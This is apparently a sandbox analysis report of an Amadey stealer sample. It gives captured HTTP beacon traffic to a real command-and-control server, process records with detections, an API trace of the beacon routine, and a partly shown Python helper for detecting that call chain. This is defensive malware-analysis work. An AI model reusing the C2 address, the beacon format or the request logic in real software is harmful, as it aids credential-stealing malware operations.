                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 50022 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:50.991095066 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:51.709582090 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:51 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 50023 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:53.227421045 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:53.936414003 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:53 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 50024 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:55.570486069 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:56.270329952 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:56 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 50025 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:57.791459084 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:58.500287056 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:58 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 50026 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:09:00.150880098 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:09:00.852583885 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:09:00 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 25 | Source IP: 192.168.2.4 | Source Port: 50027 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:09:02.373483896 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:09:03.078866959 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:09:02 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 26 | Source IP: 192.168.2.4 | Source Port: 50028 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:09:04.813427925 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:09:05.532282114 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:09:05 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Target ID:0
                                Start time:07:07:00
                                Start date:20/11/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0xf20000
                                File size:1'863'680 bytes
                                MD5 hash:EBE6DE9BE122D27057536193303F1F89
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1757169218.0000000000F21000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1714685020.0000000005260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:1
                                Start time:07:07:03
                                Start date:20/11/2024
                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Imagebase:0xe90000
                                File size:1'863'680 bytes
                                MD5 hash:EBE6DE9BE122D27057536193303F1F89
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000002.1786704967.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.1743788410.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 53%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:2
                                Start time:07:07:03
                                Start date:20/11/2024
                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                Imagebase:0xe90000
                                File size:1'863'680 bytes
                                MD5 hash:EBE6DE9BE122D27057536193303F1F89
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.1743754527.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.1786941479.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:6
                                Start time:07:08:00
                                Start date:20/11/2024
                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Imagebase:0xe90000
                                File size:1'863'680 bytes
                                MD5 hash:EBE6DE9BE122D27057536193303F1F89
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000003.2310587300.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false


                                  Execution Graph

                                  Execution Coverage:5.8%
                                  Dynamic/Decrypted Code Coverage:0.6%
                                  Signature Coverage:10.9%
                                  Total number of Nodes:340
                                  Total number of Limit Nodes:6
11872->11873 11873->11874 11874->11858 11877 e95f18 11875->11877 11876 e95ffe shared_ptr 11876->11853 11877->11876 11878 e96150 RegOpenKeyExA 11877->11878 11880 e96493 shared_ptr 11878->11880 11881 e961a3 __cftof 11878->11881 11879 e96243 RegEnumValueA 11879->11881 11880->11853 11881->11879 11881->11880 11883 e9be82 11882->11883 11885 e9c22e shared_ptr 11882->11885 11884 e9be96 Sleep InternetOpenW InternetConnectA 11883->11884 11883->11885 11886 e9bf18 11884->11886 11885->11863 11887 e9bf2e HttpOpenRequestA 11886->11887 11888 e9bf4c shared_ptr 11887->11888 11889 e9bfee HttpSendRequestA 11888->11889 11890 e9c006 shared_ptr 11889->11890 11891 e9c08e InternetReadFile 11890->11891 11892 e9c0b5 11891->11892 12002 ea6c70 12003 ea6ca0 12002->12003 12006 ea47b0 12003->12006 12005 ea6cec Sleep 12005->12003 12009 ea47eb 12006->12009 12020 ea4e73 shared_ptr std::_Xinvalid_argument 12006->12020 12007 ea4f59 shared_ptr 12007->12005 12010 e9be30 6 API calls 12009->12010 12009->12020 12021 ea4843 shared_ptr __dosmaperr 12010->12021 12011 ea5015 shared_ptr 12012 ea50de shared_ptr 12011->12012 12016 ea6c46 12011->12016 12056 e97d30 12012->12056 12014 ea50ed 12060 e98380 12014->12060 12017 ea47b0 16 API calls 12016->12017 12018 ea6cec Sleep 12017->12018 12018->12016 12019 e9be30 6 API calls 12022 ea4b62 shared_ptr 12019->12022 12020->12007 12052 e965e0 12020->12052 12021->12019 12021->12020 12022->12020 12023 ea4e5c 12022->12023 12027 ea4390 12023->12027 12025 ea4e70 12025->12020 12026 ea5106 shared_ptr 12026->12005 12028 ea43d2 12027->12028 12030 ea4646 12028->12030 12040 ea43f8 shared_ptr 12028->12040 12029 ea477e shared_ptr 12029->12025 12031 ea3640 12 API calls 12030->12031 12034 ea4610 shared_ptr 12031->12034 12032 ea4f59 shared_ptr 12032->12025 12033 e965e0 LookupAccountNameA 12036 ea5015 shared_ptr 12033->12036 12034->12029 12035 e9be30 6 API calls 12034->12035 12047 ea4e70 shared_ptr std::_Xinvalid_argument 12034->12047 12048 ea4843 shared_ptr __dosmaperr 12035->12048 12037 
ea50de shared_ptr 12036->12037 12043 ea6c46 12036->12043 12038 e97d30 GetNativeSystemInfo 12037->12038 12039 ea50ed 12038->12039 12042 e98380 GetNativeSystemInfo 12039->12042 12040->12034 12064 ea3640 12040->12064 12051 ea5106 shared_ptr 12042->12051 12044 ea47b0 16 API calls 12043->12044 12045 ea6cec Sleep 12044->12045 12045->12043 12046 e9be30 6 API calls 12049 ea4b62 shared_ptr 12046->12049 12047->12032 12047->12033 12048->12046 12048->12047 12049->12047 12050 ea4390 16 API calls 12049->12050 12050->12047 12051->12025 12092 4ad0740 12052->12092 12054 e96692 shared_ptr 12054->12011 12058 e97d96 shared_ptr __cftof 12056->12058 12057 e97ed3 GetNativeSystemInfo 12059 e97ed7 shared_ptr 12057->12059 12058->12057 12058->12059 12059->12014 12061 e983e5 shared_ptr __cftof 12060->12061 12062 e98524 GetNativeSystemInfo 12061->12062 12063 e98403 12061->12063 12062->12063 12063->12026 12065 ea367f shared_ptr __dosmaperr 12064->12065 12068 ea3ba2 shared_ptr std::_Xinvalid_argument 12064->12068 12066 ea3f42 12065->12066 12065->12068 12069 ea3c8d 12065->12069 12080 ea2f10 12066->12080 12068->12040 12071 ea1ec0 12069->12071 12074 ea1f5b shared_ptr __dosmaperr 12071->12074 12072 e9e530 6 API calls 12073 ea2a26 shared_ptr std::_Xinvalid_argument 12072->12073 12073->12068 12074->12073 12075 ea1f68 12074->12075 12076 ea28c1 12074->12076 12075->12072 12077 e9e530 6 API calls 12076->12077 12078 ea2933 12077->12078 12078->12073 12079 e95ee0 2 API calls 12078->12079 12079->12073 12082 ea2fb5 shared_ptr __cftof 12080->12082 12085 ea2f54 12080->12085 12081 e9e530 6 API calls 12086 ea3513 shared_ptr __dosmaperr 12081->12086 12083 ea33ce InternetCloseHandle InternetCloseHandle 12082->12083 12084 ea33e2 InternetCloseHandle InternetCloseHandle 12082->12084 12082->12085 12082->12086 12083->12082 12084->12082 12085->12081 12087 ea3f42 12086->12087 12089 ea360a shared_ptr std::_Xinvalid_argument 12086->12089 12090 ea3c8d 12086->12090 12088 ea2f10 8 API calls 12087->12088 12088->12089 
12089->12068 12091 ea1ec0 8 API calls 12090->12091 12091->12089 12093 e9663f LookupAccountNameA 12092->12093 12093->12054 12097 eaa210 12098 eaa290 12097->12098 12104 ea71d0 12098->12104 12100 eaa2cc shared_ptr 12101 eaa4be shared_ptr 12100->12101 12108 e93ee0 12100->12108 12103 eaa4a6 12106 ea7211 __cftof 12104->12106 12105 ea7446 12105->12100 12106->12105 12114 e92ec0 12106->12114 12109 e93f48 12108->12109 12110 e93f1e 12108->12110 12111 e93f58 12109->12111 12157 e92c00 12109->12157 12110->12103 12111->12103 12115 e92f06 12114->12115 12118 e92f6f 12114->12118 12116 eac6ac GetSystemTimePreciseAsFileTime 12115->12116 12117 e92f12 12116->12117 12120 e9301e 12117->12120 12123 e92f1d __Mtx_unlock 12117->12123 12119 e92fef 12118->12119 12125 eac6ac GetSystemTimePreciseAsFileTime 12118->12125 12119->12105 12121 eac26a 3 API calls 12120->12121 12122 e93024 12121->12122 12124 eac26a 3 API calls 12122->12124 12123->12118 12123->12122 12126 e92fb9 12124->12126 12125->12126 12127 eac26a 3 API calls 12126->12127 12128 e92fc0 __Mtx_unlock 12126->12128 12127->12128 12129 eac26a 3 API calls 12128->12129 12130 e92fd8 __Cnd_broadcast 12128->12130 12129->12130 12130->12119 12131 eac26a 3 API calls 12130->12131 12132 e9303c 12131->12132 12133 eac6ac GetSystemTimePreciseAsFileTime 12132->12133 12140 e93080 shared_ptr __Mtx_unlock 12133->12140 12134 e931c5 12135 eac26a 3 API calls 12134->12135 12136 e931cb 12135->12136 12137 eac26a 3 API calls 12136->12137 12138 e931d1 12137->12138 12139 eac26a 3 API calls 12138->12139 12141 e93193 __Mtx_unlock 12139->12141 12140->12134 12140->12136 12142 e931a7 12140->12142 12145 eac6ac GetSystemTimePreciseAsFileTime 12140->12145 12141->12142 12143 eac26a 3 API calls 12141->12143 12142->12105 12144 e931dd 12143->12144 12146 e9315f 12145->12146 12146->12134 12146->12138 12146->12141 12148 eabd4c 12146->12148 12151 eabb72 12148->12151 12150 eabd5c 12150->12146 12152 eabb9c 12151->12152 12153 eacf6b _xtime_get GetSystemTimePreciseAsFileTime 12152->12153 
12156 eabba4 __Xtime_diff_to_millis2 12152->12156 12154 eabbcf __Xtime_diff_to_millis2 12153->12154 12155 eacf6b _xtime_get GetSystemTimePreciseAsFileTime 12154->12155 12154->12156 12155->12156 12156->12150 12158 e92c0e 12157->12158 12164 eab847 12158->12164 12160 e92c42 12161 e92c49 12160->12161 12170 e92c80 12160->12170 12161->12103 12163 e92c58 std::_Xinvalid_argument 12165 eab854 12164->12165 12169 eab873 Concurrency::details::_Reschedule_chore 12164->12169 12173 eacb77 12165->12173 12167 eab864 12167->12169 12175 eab81e 12167->12175 12169->12160 12181 eab7fb 12170->12181 12172 e92cb2 shared_ptr 12172->12163 12174 eacb92 CreateThreadpoolWork 12173->12174 12174->12167 12177 eab827 Concurrency::details::_Reschedule_chore 12175->12177 12179 eacdcc 12177->12179 12178 eab841 12178->12169 12180 eacde1 TpPostWork 12179->12180 12180->12178 12182 eab817 12181->12182 12183 eab807 12181->12183 12182->12172 12183->12182 12185 eaca78 12183->12185 12186 eaca8d TpReleaseWork 12185->12186 12186->12182 12187 ea93e0 12188 ea9433 12187->12188 12189 ea93f5 12187->12189 12193 ead111 12189->12193 12191 ea93ff 12191->12188 12197 ead0c7 12191->12197 12195 ead121 12193->12195 12194 ead12a 12194->12191 12195->12194 12201 ead199 12195->12201 12198 ead0d7 12197->12198 12199 ead17f 12198->12199 12200 ead17b RtlWakeAllConditionVariable 12198->12200 12199->12188 12200->12188 12202 ead1a7 SleepConditionVariableCS 12201->12202 12204 ead1c0 12201->12204 12202->12204 12204->12195 12205 ea87d0 12206 ea882a __cftof 12205->12206 12212 ea9bb0 12206->12212 12208 ea8854 12211 ea886c 12208->12211 12216 e943f0 12208->12216 12210 ea88d9 std::_Throw_future_error 12213 ea9be5 12212->12213 12222 e92ce0 12213->12222 12215 ea9c16 12215->12208 12217 eabedf InitOnceExecuteOnce 12216->12217 12218 e9440a 12217->12218 12219 e94411 12218->12219 12220 ec6cbb 2 API calls 12218->12220 12219->12210 12221 e94424 12220->12221 12223 e92d1d 12222->12223 12224 eabedf InitOnceExecuteOnce 12223->12224 12225 e92d46 
12224->12225 12226 e92d51 12225->12226 12227 e92d88 12225->12227 12231 eabef7 12225->12231 12226->12215 12238 e92440 12227->12238 12232 eabf03 std::_Xinvalid_argument 12231->12232 12233 eabf6a 12232->12233 12234 eabf73 12232->12234 12241 eabe7f 12233->12241 12236 e92ae0 3 API calls 12234->12236 12237 eabf6f 12236->12237 12237->12227 12251 eab5d6 12238->12251 12240 e92472 12242 eacc31 InitOnceExecuteOnce 12241->12242 12243 eabe97 12242->12243 12244 eabe9e 12243->12244 12247 ec6cbb 12243->12247 12244->12237 12249 ec6cc7 12247->12249 12248 ec8bec 2 API calls 12250 ec6cf6 12248->12250 12249->12248 12252 eab5f1 std::_Xinvalid_argument 12251->12252 12253 ec8bec 2 API calls 12252->12253 12254 eab658 12252->12254 12255 eab69f 12253->12255 12254->12240

                                  Control-flow Graph
                                  (Basic-block graph of the function at 00E9BE30, drawn interactively in the original report with executed and not-executed blocks colored differently; the block and edge list is omitted here. Subcalls in the graph: 00EA80C0, 00EA7A00, 00E95C10, 00EAD663, 00EC6C6A, 00EACFF1, 00EC4250. API calls in the graph: Sleep, InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile.)
                                  APIs
                                  • Sleep.KERNELBASE(000005DC), ref: 00E9BEB8
                                  • InternetOpenW.WININET(00EE8DC8,00000000,00000000,00000000,00000000), ref: 00E9BEC8
                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BEEC
                                  • HttpOpenRequestA.WININET(?,00000000), ref: 00E9BF36
                                  • HttpSendRequestA.WININET(?,00000000), ref: 00E9BFF6
                                  • InternetReadFile.WININET(?,?,000003FF,?), ref: 00E9C0A8
                                  • InternetCloseHandle.WININET(?), ref: 00E9C187
                                  • InternetCloseHandle.WININET(?), ref: 00E9C18F
                                  • InternetCloseHandle.WININET(?), ref: 00E9C197
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Similarity
                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                  • String ID: 0a$8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$Xa$invalid stoi argument$stoi argument out of range
                                  • API String ID: 2167506142-761132540
                                  • Opcode ID: 9431baeddcd3540dc5b2eaf99b7befd011b36376ba058f468195e6c13d8f6f83
                                  • Instruction ID: 0c9fe448bc7849bee571dae8383171160df1a82259f9c0b547113630746e5542
                                  • Opcode Fuzzy Hash: 9431baeddcd3540dc5b2eaf99b7befd011b36376ba058f468195e6c13d8f6f83
                                  • Instruction Fuzzy Hash: 94B1F4B1A002189BDF28DF28CC84BEEBBB5EF45304F505199F509A72D1DB719AC4CB95
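                                  The API list above for 00E9BE30 is one plain WinINet request: a Sleep of 0x5DC (1500 ms), InternetOpenW, InternetConnectA to port 0x50 (80) with dwService 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA, HttpSendRequestA, InternetReadFile in 0x3FF-byte (1023) chunks, then three InternetCloseHandle calls. The Python below is an added triage helper, not code from Joe Sandbox or from the sample: it parses API lines in the report's own "Name.MODULE(args), ref: addr" format, matches the ordered WinINet chain even when unrelated calls are interleaved, and decodes the port, service type, preceding sleep and read size from the argument positions given in the WinINet documentation (assumption: the trace lists parameters in declaration order, as this report does). The embedded trace is copied from this report; the heading line, the decoy GetNativeSystemInfo line and the missing-step variant in the test are constructed.

```python
"""Match the WinINet HTTP request chain in a Joe Sandbox style API trace.

Added example for this report page; not part of Joe Sandbox or of the sample.
Input lines use the report's own "APIs" format:
    Name.MODULE(arg1,arg2,...), ref: 00E9BEB8
Arguments are hexadecimal; '?' marks a value the sandbox did not resolve.
Argument positions follow the WinINet documentation (assumption: the trace
lists parameters in declaration order, as Joe Sandbox does here).
"""
import re
from typing import Dict, List, Optional

# Ordered call chain of a minimal WinINet HTTP request (A/W suffix ignored).
BEACON_CHAIN = ["InternetOpen", "InternetConnect", "HttpOpenRequest",
                "HttpSendRequest", "InternetReadFile"]
INTERNET_SERVICE = {1: "FTP", 3: "HTTP"}  # dwService values of InternetConnect

_LINE = re.compile(
    r"^\s*•?\s*(?P<name>\w+?)(?P<suffix>[AW])?\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


def parse_api_line(line: str) -> Optional[Dict]:
    """Parse one API line; returns None for headings and other non-API text."""
    m = _LINE.match(line)
    if not m:
        return None
    raw = (m.group("args") or "").strip()
    args = [None if a.strip() == "?" else int(a, 16)
            for a in raw.split(",")] if raw else []
    return {"name": m.group("name"), "module": m.group("mod"),
            "args": args, "ref": int(m.group("ref"), 16)}


def find_wininet_beacon(lines: List[str]) -> Optional[Dict]:
    """Return details of the first complete chain, or None if a step is missing.

    Steps must occur in order, but unrelated calls may sit between them, which
    is how the chain appears in a real trace (string building, CRT calls...).
    """
    calls = [c for c in map(parse_api_line, lines) if c]
    step, sleep_ms = 0, None
    result: Dict = {"chain": []}
    for c in calls:
        if step == 0 and c["name"] == "Sleep" and c["args"]:
            sleep_ms = c["args"][0]             # last Sleep before the chain
        if c["module"] != "WININET" or c["name"] != BEACON_CHAIN[step]:
            continue
        a = c["args"]
        if c["name"] == "InternetConnect" and len(a) >= 6:
            result["port"] = a[2]                # nServerPort
            result["service"] = INTERNET_SERVICE.get(a[5], "unknown")  # dwService
        if c["name"] == "InternetReadFile" and len(a) >= 3:
            result["read_chunk"] = a[2]          # dwNumberOfBytesToRead
        result["chain"].append(f"{c['name']}@{c['ref']:08X}")
        step += 1
        if step == len(BEACON_CHAIN):
            result["sleep_before_ms"] = sleep_ms
            result["close_handle_calls"] = sum(
                1 for x in calls if x["name"] == "InternetCloseHandle")
            return result
    return None


# Trace copied from this report's API list for 00E9BE30, plus two constructed
# decoy lines (a heading and an unrelated call) to show that they are skipped.
REPORT_TRACE = [
    "APIs",
    "Sleep.KERNELBASE(000005DC), ref: 00E9BEB8",
    "InternetOpenW.WININET(00EE8DC8,00000000,00000000,00000000,00000000), ref: 00E9BEC8",
    "GetNativeSystemInfo.KERNELBASE(?), ref: 00E97ED3",
    "InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BEEC",
    "HttpOpenRequestA.WININET(?,00000000), ref: 00E9BF36",
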